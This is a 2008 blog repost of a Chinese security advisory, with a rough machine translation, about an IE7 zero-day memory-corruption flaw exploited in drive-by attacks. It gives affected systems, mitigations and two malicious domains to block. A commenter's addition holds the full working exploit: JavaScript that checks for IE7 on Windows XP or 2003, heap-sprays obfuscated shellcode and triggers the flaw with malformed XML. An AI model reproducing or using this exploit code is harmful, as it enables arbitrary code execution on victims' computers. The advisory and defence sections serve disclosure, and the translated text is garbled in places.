Thursday, December 11, 2008

IE7 Updates from blog.wang1.cn

UPDATE from http://blog.wang1.cn/?action=show&id=1233


IE7 0DAY攻击代码已经在挂马攻击遭利用

Posted by monk on 2008, December 10, 8:47 AM. Filed in 漏洞收集整理

# 鬼仔:刚才发的IE7 0day

来源:知道安全

鉴于此漏洞的危险性,作为美国微软在国内的安全服务提供商,我们已第一时间发布公告并且分析出漏洞细节,并提交给美国微软相关部门,这里不再公布具体细节。

知道安全团队(KnownSec team)于近期捕获利用IE7一个内存越界的漏洞进行攻击的恶意代码。此漏洞于11月在小范围内泄露,于12月9日前后才完全出售流通在黑色产业,并且有人赶制出网马生成器,相信会在短期内十分流行。

由于该漏洞在我们监控系统最初捕获时我们团队没有很详细地分析,以为是已经被修补的漏洞,并且在网络上发现了很多网马以及代码帖子,以为不是0DAY漏洞,便在内部共享粘贴流出了网络上流传的代码以及挂马页面的代码。这是我们的失误:(

历史:

IE7的XML里存在可以导致内存越界的漏洞,通过编写畸形XML代码并且使用JavaScript脚本操作SHELLCODE去执行任意代码。

在2008年下半年开始有流传IE7的漏洞,并于10月份左右开始流出私人买卖,于11月份流入黑市买卖,开始有人面谈出售。

最终出现在网络的具体时间为12月份,大量二手三手漏洞在黑产运作层流通,并且于12月份初开始有大量的人购买二手代码去开发生成器,在9号开始出现在挂马利用上。

分析:

影响版本:

系统:

WINDOWS XP

WINDOWS 2003

浏览器:

IE7

描述:

由于SDHTML里处理对象存在在错误导致内存紊乱。
构造某种条件可以使得SDHTML检测到错误释放已被分配的对象,但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行,如果这些内存又被分配给其他用途,将导致SDHTML把这些内存当作一个对象来操作。0DAY挂马里使用了XML的SRC字符串对象占用了这些释放对象的空间,而对象指针里包含函数例程指针,最终导致代码执行 。

由于该漏洞尚未被修补,具体细节请等待微软官方发布补丁的详细参考。

防御:

1.请关注微软官方网站及时下载补丁。

2. 开启DEP保护:

系统属性——高级——性能——数据执行保护

可以防止恶意攻击。

3.将wwwwyyyyy.cn以及sllwrnm5.cn加入HOSTS进行屏蔽。

复制一下代码进入HOSTS即可:

127.0.0.1 wwwwyyyyy.cn

127.0.0.1 sllwrnm5.cn

buhu:补充一段利用代码
JavaScript代码


2. if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
3.
4. function sleep(milliseconds)
5. {
6. var start=new Date().getTime();
7.
8. for(var i=0;i<1e7;i++)
9. {if((new Date().getTime()-start)>milliseconds)
10. {break}
11. }
12. }
13.
14. function spray(sc)
15. {
16. var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
17. var heapBlockSize=0x100000;
18. var payLoadSize=infect.length*2;
19. var szlong=heapBlockSize-(payLoadSize+0x038);
20. var retVal=unescape("%u0a0a%u0a0a");
21. retVal=getSampleValue(retVal,szlong);
22. aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
23. zzchuck=new Array();
24. for(i=0;i< aaablk;i++){zzchuck[i]=retVal+infect}
25. }
26.
27. function getSampleValue(retVal,szlong)
28. {
29. while(retVal.length*2 < szlong)
30. {retVal+=retVal}
31. retVal=retVal.substring(0,szlong/2);
32. return retVal
33. }
34.
35. var a1="dadong";
36. spray(a1+"9090"+a1+"dadong9090da
dong9090dadongE1D9dadong34D9dadong582
4dadong5858dadong3358dadongB3DBdadong
031Cdadong31C3dadong66C9dadongE981dad
ongFA65dadong3080dadong4021dadongFAE2
dadong17C9dadong2122dadong4921dadong0
121dadong2121dadong214BdadongF1DEdado
ng2198dadong2131dadongAA21dadongCAD9da
dong7F24dadong85D2dadongF1DEdadongD7C9
dadongDEDEdadongC9DEdadong221Cdadong212
1dadongD9AAdadong19C9dadong2121dadongC9
21dadong206Cdadong2121dadong67C9dadong2
121dadongC921dadong22FAdadong2121dadong
D9AAdadong03C9dadong2121dadongC921dadon
g2065dadong2121dadong11C9dadong2121dado
ngC921dadong22A8dadong2121dadongD9AAdado
ng2DC9dadong2121dadongC921dadong2040dado
ng2121dadong3BC9dadong2121dadongCA21dad
ong7279dadongFDAAdadong4B72dadong4961da
dong3121dadong2121dadongC976dadong2390d
adong2121dadongC4C9dadong2121dadong7921
dadong72E2dadongFDAAdadong4B72dadong490
1dadong3121dadong2121dadongC976dadong23
B8dadong2121dadongECC9dadong2121dadong7
921dadong76E2dadong1DC9dadong2125dadong
AA21dadong12D9dadong68E8dadongE112dado
ngE291dadongD3DDdadongAC8FdadongDE66dad
ongE27Edadong1F7Adadong26E7dadong1F99da
dong7EA8dadong4720dadongE61Fdadong2466da
dongC1DEdadongC8E2dadong25B4dadong2121da
dongA07Adadong35CDdadong2120dadongAA21da
dong1FF5dadong23E6dadong4C42dadong0145da
dongE61Fdadong2563dadong420Edadong0301da
dongE3A2dadong1229dadong71E1dadong4971da
dong2025dadong2121dadong7273dadongC971da
dong22E0dadong2121dadongF1DEdadongDDAAda
dongE6AAdadongE1A2dadong1F29dadong39ABda
dongFAA5dadong2255dadongCA61dadong1FD7da
dong21E7dadong1203dadong1FF3dadong71A9da
dongA220dadong75CDdadongE112dadongFA12da
dongEDAAdadongD9A2dadong5C75dadong1F28da
dong3DA8dadongA220dadong25E1dadongD3CAda
dongEDAAdadongF8AAdadongE2A2dadong1231da
dong1FE1dadong62E6dadong200Ddadong2121da
dong7021dadong7172dadong7171dadong7171da
dong7671dadongC971dadong2218dadong2121da
dong38C9dadong2121dadong4521dadong2580da
dong2121dadongAC21dadong4181dadongDEDEda
dongC9DEdadong2216dadong2121dadongFA12da
dong7272dadong7272dadongF1DEdadong19A1da
dongA1C9dadongC819dadong2E54dadong59A0da
dongB124dadongB1B1dadong55B1dadong7427da
dongCDAAdadong61ACdadongDE24dadongC9C1da
dongDE0FdadongDEDEdadongC9E2dadongDE09da
dongDEDEdadong3099dadong2520dadongE3A1da
dong212Ddadong3AC9dadongDEDEdadong12DEda
dong71E1dadongC975dadong2175dadong2121dad");
37.
38. sleep(3000);
39.
40. nav=navigator.userAgent.toLowerCase();
41. if(navigator.appVersion.indexOf('MSIE')!=-1)
42. {
43. version=parseFloat(navigator.appVersion.split('MSIE')[1])
44. }
45. if(version==7)
46. {
47. w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
48. wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
49. if(wxp||w2k3)document.write('< ! [ CDATA[< ! [ CDATA[>]]>');
50. var i=1;while(i<=10)
51. {
52. window.status=" ";i++}
53. }



Translated version:

Aberdeen # ghost: just made the IE7 0day

Source: Security know

In view of the danger of this loophole, as the United States in Microsoft's internal security service providers, we have the first announcement and analysis of the details of the vulnerability, Microsoft and submitted to the relevant departments of the United States, there is no longer publish the details.

Aware of the security team (KnownSec team) in the near future to use IE7 capture a memory of the loopholes in the cross-border attacks by malicious code. This loophole in November in a small area leak, in the Dec. 9 after the sale of full circulation in the black industry, and was working towards a network of horse generator and I believe it is very popular in the short term.

As the loopholes in our monitoring system to capture the first team when we are not very detailed analysis, is that the loophole has been repaired, and the network has identified a number of MA and the net post code, that is not 0DAY loopholes in the internal sharing paste Out of a network linked to the spread of the code, as well as Ma page code. This is our mistake: (

History:

IE7's XML can lead to memory, there are loopholes in cross-border, through the preparation of abnormal use of JavaScript and XML code script SHELLCODE operation to execute arbitrary code.

In the second half of 2008 have been loopholes in IE7, and was about to start in October out of a private sale in November into the black market trading, it was the beginning of the sale of Interviews.

Finally appear in a specific time for the network in December, a large number of second-hand or third-hand loophole in the production and operation of the flow layer, and in early December to start a large number of people buying second-hand to develop the code generator, on the 9th Malaysia began to hang in the use of On.

Analysis:

Impact version:

System:

WINDOWS XP

WINDOWS 2003

Browser:

IE7

Description:

SDHTML to deal with, because of the existence of objects in memory error led to the disorder.
Construction certain conditions can be detected SDHTML make the release mistakes have been the target of distribution, but has been released after SDHTML distribution of the object did not return but were released to continue to use the memory of the implementation of the object, if the memory was allocated to other purposes , Will lead to SDHTML such as a memory object to the operation. 0DAY linked to the use of the Mali XML string of SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

Due to the loophole has not been repaired, please wait for the details of the official Microsoft patch release detailed reference.

Defense:

1. Please take heed of the official Microsoft site to download patches in a timely manner.

2. Open the DEP protection:

System Properties - High - Performance - Data Execution Prevention

Can prevent malicious attacks.

3. Wwwwyyyyy.cn will join sllwrnm5.cn, as well as shielding for HOSTS.

Copy the code you can enter the HOSTS:

127.0.0.1 wwwwyyyyy.cn

127.0.0.1 sllwrnm5.cn

buhu: to add a section to use code
JavaScript code... Same as above

-EF

No comments: